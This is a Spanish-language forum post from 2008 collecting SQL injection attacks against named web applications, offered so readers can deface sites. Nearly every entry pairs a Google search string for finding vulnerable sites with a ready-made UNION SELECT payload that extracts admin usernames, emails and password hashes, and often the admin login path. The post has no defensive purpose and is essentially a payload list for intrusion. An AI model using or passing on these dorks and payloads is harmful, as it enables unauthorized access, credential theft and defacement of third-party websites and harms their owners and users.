Inyeccion SQL al completo ( todas las inyecciones )

Iniciado por R1D4R, 13 Diciembre 2008, 20:02 PM

0 Miembros y 2 Visitantes están viendo este tema.

R1D4R

Aqui dejo esta recopilacion con las diferentes tipos de inyecciones que encontre ,todas estan probadas por mi y por supuesto aunque es algo dificil de encontrar algunas con dicha vulnerabilidad , las hay  ;)

Deface Fundlink SQL
Lo Que Buscaremos En Google: allinurl: \"fundlinkllc.com\"
Inyeccions SQL: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

Deface PHP-Newsletter(cat_id) SQL
Lo Que Buscaremos En Google: llinurl: \"index.php?pgid\"cat_id
Inyeccion SQL: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

Deface Powered by Com Endeavors SQL
Buscar En Google: allinurl: \"index.php?go=detail\"
Inyeccion SQL: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--

Deface Powered by niccell SQL
Buscar En Google: "powered by niccell"
Inyeccions SQL: list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*

Deface KwsPHP v1.3.456 SQL
Buscar En Google: "index.php?mod=galerie"action=gal
Inyeccion SQL: index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*

Deface Powered by Esy SQL
Buscar En Google: \"Powered by Esy\"
Inyeccion SQL: sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
Inyeccions SQL 2: sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

Deface showresult
Buscar En Google: allinurl: "index.php?p=poll"showresult
Inyeccion SQL: index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user

Deface powered by koobi-cms 4.3.0
Buscar En Google: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
Inyeccion SQL: index.php?area=1&p=gallery&action=showimages&galid=[SQL]
ESTE PARA EL ADMIN: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

Deface Powered by BosClassifieds Classified Ads System
Buscar En Google: "Powered by BosClassifieds Classified Ads System"
Inyeccion SQL: site.c0m/bosclassifieds/index.php?cat=[SQL]
Solo Para versión: BosClassifieds 3.0

Deface Powered by SmallBiz eShop
Buscar En Google: Powered by SmallBiz eShop
Inyeccion SQL: index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(5,8)user(),char(5,version()),char)/*

Deface pollBooth
Buscar En Google: allinurl: "pollBooth.php?op=results"pollID
Inyeccion SQL: pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

Deface RS MAXSOFT
Buscar En Google: "RS MAXSOFT"
Inyeccion SQL: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm

Deface gallerypic img
Buscar En Google: allinurl: "index.php?p=gallerypic img_id"
Inyeccion SQL: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
Inyeccion SQL 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
Admin Login: login=admin/login.php

Deface Powere By SSWD
Buscar En Google: allinurl: "index.php?go=subcat"
Inyeccion SQL: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*

Deface Powered by OpenLD
Buscar En Google: "Powered by OpenLD"
Inyeccion SQL: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null  ,null,null,null,null/**/FROM/**/settings--

Deface Index php P Shop
Buscar En Google: allinurl: "index php p shop"categ
Inyeccion SQL: index.php?p=shop&show=showdetail&fid=ulus&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by Site Sift
Buscar En Google 1 : powered by Site Sift
Buscar En Google 2 : allinurl: "index php go addpage"
Buscar En Google 3 : allinurl: "index.php?go=detail id="
Inyecion SQL 1 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
Inyecion SQL 2 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Admin Login: admin/login.php

Deface Showlink
Buscar En Google: allinurl: "index.php?showlink"links
Inyeccion SQL: index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by eSyndiCat
Buscar Google: © 2005-2006 Powered by eSyndiCat Directory Software
Inyeccion SQL: news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
Admin Login: from%20dir_admins/*

Deface CartWeaver
Buscar En Google: allinurl:Results.cfm?category=
Inyecion SQL Para Sacar El Nombre Del Admin: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
Inyecion SQL Para Sacar La Password: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
Admin Login: /cw2/admin/

Deface Bwired
Buscar En Google: "Powered by bwired" inurl:?newsID=
Inyeccion SQL: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

Deface Powered by Md-Pro
Buscar En Google: "Powered by Md-Pro"
Inyeccion SQL: index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

DefaceBrowse Blogs by Category
Buscar En Google: allintext:"Browse Blogs by Category"
Inyeccion SQL: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*

Deface eMeeting Online Dating Software 5.2
Buscar En Google: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
Inyecion SQL 1 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
Inyecion SQL 2 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

Deface FlashGameScript 1.7
Buscar En Google: "Powered by FlashGameScript"
Inyeccion SQL 1 : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/*
Inyeccion SQL 2 : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr om+members+where+user_type=2/*